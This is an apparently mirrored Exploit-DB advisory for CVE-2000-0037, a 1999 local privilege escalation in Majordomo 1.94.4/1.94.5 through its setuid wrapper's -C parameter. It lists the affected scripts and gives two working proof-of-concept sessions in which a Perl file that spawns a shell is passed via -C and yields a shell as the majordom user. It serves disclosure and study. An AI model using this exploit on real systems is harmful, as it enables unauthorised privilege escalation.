- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 19699
- Проверка EDB
-
- Пройдено
- Автор
- SHEVEK
- Тип уязвимости
- LOCAL
- Платформа
- LINUX
- CVE
- cve-2000-0037
- Дата публикации
- 1999-12-29
Majordomo 1.94.4/1.94.5 - Local -C Parameter (1)
Код:
source: https://www.securityfocus.com/bid/903/info
It is possible for a local user to gain majordomo privileges through a vulnerability which allows privileged arbitrary commands to be executed. If the -C parameter is passed to majordomo (or one of several other scripts) when run with the setuid root wrapper, the argument to -C will be executed with majordomo privileges.
This occurs on several scripts: archive2.pl, bounce-remind, config-test, digest, majordomo, request-answer and resend. medit under bin/, and archive_mh.pl, new-list, and sequencer under Tools/ uses 'require' in the same way, but since the wrapper only executes those scripts found in the majordomo installation directory, they cannot be exploited.
shevek@tirin ~$ cat foo.pl
system("/bin/csh");
shevek@tirin ~$ /usr/local/majordomo/wrapper majordomo -C /home/shevek/foo.pl
%
%whoami
majordom
------
Here's another example (using a different script), posted to Bugtraq by Federico G. Schwindt <Federico G. Schwindt> on May 23, 2000:
$ cat /tmp/myconf
system("/bin/sh");
$ id
uid=1000(fgsch) gid=1000(fgsch) groups=1000(fgsch), 0(wheel), 11(core)
$ ./wrapper bounce-remind -C /tmp/myconf
$ id
uid=41(majordom) gid=41(majordom) groups=1000(fgsch), 0(wheel), 11(core)- Источник
- www.exploit-db.com
